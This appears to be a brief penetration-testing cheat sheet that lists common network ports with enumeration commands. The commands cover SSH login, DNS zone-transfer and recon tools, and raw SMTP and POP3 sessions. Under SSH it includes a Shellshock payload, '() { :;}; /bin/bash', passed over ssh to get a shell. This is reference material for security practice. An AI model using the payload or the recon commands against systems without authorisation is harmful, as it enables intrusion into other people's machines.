
## Ports Enumeration ##

* 21 - FTP Server

* 22 - SSH Server

   * ```sudo ssh user@x.x.x.x```
   * ```sudo ssh -i /path/private.key user@x.x.x.x```
   * ```sudo ssh -i /path/private.key use@x.x.x.x '() { :;}; /bin/bash'``` - Shell Shock Vulnerability

* 23 - Telnet

* 25 - SMTP(Simple Mail Transfer Protocol) Server

   The following is an actual SMTP session. All sessions must start with HELO and end with QUIT. <br/>
   HELO my.server.com <br/>
   MAIL FROM: user1@10.x.x.x <br/>
   RCPT TO: user2@10.x.x.x <br/>
   DATA <br/>
   all data goes here <br/>
   .    - this dot is used to end the message <br/>
QUIT <br/>

* 53 - DNS

  * ```host -t ns <domain/ipaddr>```
  * ```host -l <domain name> <dns server address> ```
  * ```host -t mx <domain/ipaddr>```
  * ```nslookup```
  * ```dnsrecon -d <ip-adr>```
  * ```dnsenum```
  * ```host -l <domain name> <dns server address/ns1.megacorp.com>```

* 80 - HTTP

* 110 - POP3(Post Office Protocol 3) Server

     Normal program flow: <br/>
     USER <br/>
     PASS <br/>
     LIST<br/>
     DELE <br/>
     QUIT <br/>

* 119 - NNTP 

* 123 - NTP

* 139 - NBT/NETBIOS  </br>
  * ```nbtscan -r <ip-addr>```

* 143 - IMAP4

* 161 - SNMP

* 443 - HTTPS

* 445 - SMB (Emulates Windows Server/ Connects to remote network devices)

* 3389 - RDP (Remote Desktop Protocol)


